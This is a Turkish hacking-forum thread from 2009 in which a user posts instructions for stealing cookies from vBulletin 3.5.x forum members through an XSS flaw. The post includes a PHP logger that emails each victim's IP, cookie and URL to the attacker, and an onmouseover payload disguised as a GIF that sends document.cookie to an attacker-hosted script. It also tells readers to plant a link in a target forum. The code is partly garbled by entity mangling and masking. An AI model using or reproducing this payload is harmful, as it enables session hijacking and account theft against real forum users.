İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

VBulletin 3.5.X Xss Açığı

22-06-2009 11:52
#1
mortimit - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2008
Nereden:
Ankara
Yaş:
27
Mesajlar:
178
Teşekkür (Etti):
24
Teşekkür (Aldı):
100
Konular:
56
Ticaret:
(0) %
vBulletin 3.5.X Xss Acıgı Ile Cookıe Alma



vBulletin 3.5.X Xss Acıgı Ile Cookıe Alma [Yeni Acık]



acık yenı bı acık ve maılınıze cookıelerı yolluyor yontem soyle;

(exploit.php) adında php dosya hazırlayıp ıcıne;



Kod:
<?php&l036;ip_adresse = &l036;_SERVER[&l92;&l92;&l039;REMOTE_ADDR&l92;&l92;&l039;];if(!empty(&l036;ip_adresse))&l123;echo &l92;&l92;&l039;il tuo ip ?: &l92;&l92;&l039;,&l036;ip_adresse;}else&l123;ec ho &l92;&l92;&l039;Impossible d&l92;&l92;&l92;&l92;&l92;&l92;&l039;afficher l&l92;&l92;&l92;&l92;&l92;&l92;&l039;IP&l92;&l92;& l039;;}?><a href=&l92;&l92;"log.php&l92;&l92;"></a><?&l036;xx1=&l036;HTTP_SERVER_VARS[&l92;&l92;&l039;SERVER_PORT&l92;&l92;&l039;];&l036;day = date(&l92;&l92;"d&l92;&l92;",time()); &l036;month = date(&l92;&l92;"m&l92;&l92;",time()); &l036;year = date(&l92;&l92;"Y&l92;&l92;",time());if (&l036;REMOTE_HOST == &l92;&l92;"&l92;&l92;") &l036;visitor_info = &l036;REMOTE_ADDR;else &l036;visitor_info = &l036;REMOTE_HOST;&l036;base = &l92;&l92;&l039;http://&l92;&l92;&l039; . &l036;HTTP_SERVER_VARS[&l92;&l92;&l039;SERVER_NAME&l92;&l92;&l039;] . &l036;PHP_SELF;&l036;x1=`host &l036;REMOTE_ADDR|grep Name`;&l036;x2=&l036;REMOTE_PORT;?><?php&l036;**** ** = &l036;_GET[&l92;&l92;&l039;c&l92;&l92;&l039;];?><?php&l036;myemail = &l92;&l92;"YOUR ADDRESS E-MAIL&l92;&l92;";&l036;today = date(&l92;&l92;"l, F j, Y, g:i a&l92;&l92;") ;&l036;subject = &l92;&l92;"Xss Vbulletin&l92;&l92;" ;&l036;message = &l92;&l92;"Xss: HackingIp: &l036;ip_adresse******: &l036;******Url: &l036;baseporta usata: &l036;xx1remote port: &l036;x2Giorno & Ora : &l036;today &l92;&l92;&l92;&l92;n&l92;&l92;";&l036;from = &l92;&l92;"From: &l036;myemail&l92;&l92;&l92;&l92;r&l92;&l92;&l92;& l92;n&l92;&l92;";mail(&l036;myemail, &l036;subject, &l036;message, &l036;from);?>Bunları koyup kaydedıyoruz ve hostumuza atıyoruz free de olur.&l036;myemail = &l92;&l92;"YOUR ADDRESS E-MAIL&l92;&l92;
kodlarda bu kısma maıl adresımızı yazıyoruz..

Daha sonra bır notepad acıp ıcıne;


Code:

Kod:
<pre a=&l92;&l92;&l039;>&l92;&l92;&l039; onmouseover=&l92;&l92;&l039;********.********=&l92 ;&l92;"http://YOUR ADDRESS WEB.com/exploit.php?c=&l92;&l92;"+********.******&l92;&l92 ;&l039; b=&l92;&l92;&l039;</pre&l92;&l92;&l039; >
bu kodları koyup gif olarak kaydedıyoruz edıtlenecek kısmı kendınıze gore edıtleyın..

Son olarak hedef foruma gıdıp uye olup konu acarken su mesaj kısmına sunu yazıyoruz


Code:

Kod:
<a href=&l92;&l92;"http://YOUR ADDRESS WEB.com/IMAGE.GIF&l92;&l92;" target=&l92;&l92;"_blank&l92;&l92;">Tıklayınız</a> &l92;&l92;&l039;Gereklı yerlerı kendınıze gore edıtleyınız.


Alıntıdır.. Verildiyse Özür Dilerim...

01-07-2010 23:52
#2
kuscugur - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2010
Mesajlar:
55
Teşekkür (Etti):
19
Teşekkür (Aldı):
1
Konular:
3
Ticaret:
(0) %
alıntı yapıyorsun sn hepp

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı